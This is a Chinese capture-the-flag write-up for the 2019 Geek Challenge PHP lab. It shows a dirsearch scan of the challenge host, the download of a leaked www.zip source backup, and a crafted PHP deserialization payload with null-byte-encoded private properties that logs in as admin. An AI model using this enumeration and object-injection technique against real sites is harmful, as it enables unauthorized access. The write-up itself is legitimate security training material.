[极客大挑战 2019]PHP1

worker..2024-08-02 22:30

打开题目

游戏界面

猜测php里面有文件,我们可以用dirsearch 扫描一下这个服务器

执行命令

dirsearch -u http://2999dfd5-1d43-4a81-a088-9e41c9dccab4.node4.buuoj.cn/ -e php > test.log

最后在log文件中找到一个 200 www.zip

浏览器输入payload下载下来

得到目录文件

解读一下php代码,进行反序列化

payload

?select=O:4:"Name":3:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}

但是发现这个里面有空格,所以把空格url编码变成%00再传参

Payload:

/?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

相关推荐
bqliang2 分钟前
Jetpack Navigation 3:领航未来
android·android studio·android jetpack
云存储小天使11 分钟前
安卓蛙、苹果蛙为什么难互通?
android
陈大头铃儿响叮当2 小时前
Android Studio升级后,Flutter运行android设备报错
android·flutter·android studio
勤劳打代码3 小时前
isar_flutter_libs 引发 Namespace not specified
android·flutter·groovy
奔跑吧 android4 小时前
【android bluetooth 协议分析 18】【PBAP详解 2】【车机为何不显示电话号码为空的联系人信息】
android·蓝牙电话·hfp·pbap·电话簿
深盾科技4 小时前
安卓二次打包技术深度拆解:从逆向篡改到防护逻辑
android
4Forsee4 小时前
【Android】消息机制
android·java·前端
2501_915921435 小时前
iOS 虚拟位置设置实战,多工具协同打造精准调试与场景模拟环境
android·ios·小程序·https·uni-app·iphone·webview
龚礼鹏6 小时前
Android 图像显示框架三——演示demo以及解析
android·交互
QuantumLeap丶6 小时前
《Flutter全栈开发实战指南:从零到高级》- 11 -状态管理Provider
android·flutter·ios
热门推荐
01GitHub 镜像站点02综合整理:pdf预览显示:你尝试预览的文件可能对你的计算机有害。如果你信任此文件以及其来源,请打开此文件以看其内容,如何解决以正常预览文件03UV安装并设置国内源04npm使用国内淘宝镜像的方法05Linux下V2Ray安装配置指南06《大数据技术原理与应用》实验报告三 熟悉HBase常用操作07BongoCat - 跨平台键盘猫动画工具08NVIDIA显卡驱动、CUDA、cuDNN 和 TensorRT 版本匹配指南09GitLab 零基础入门指南:从安装到项目管理全流程10安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)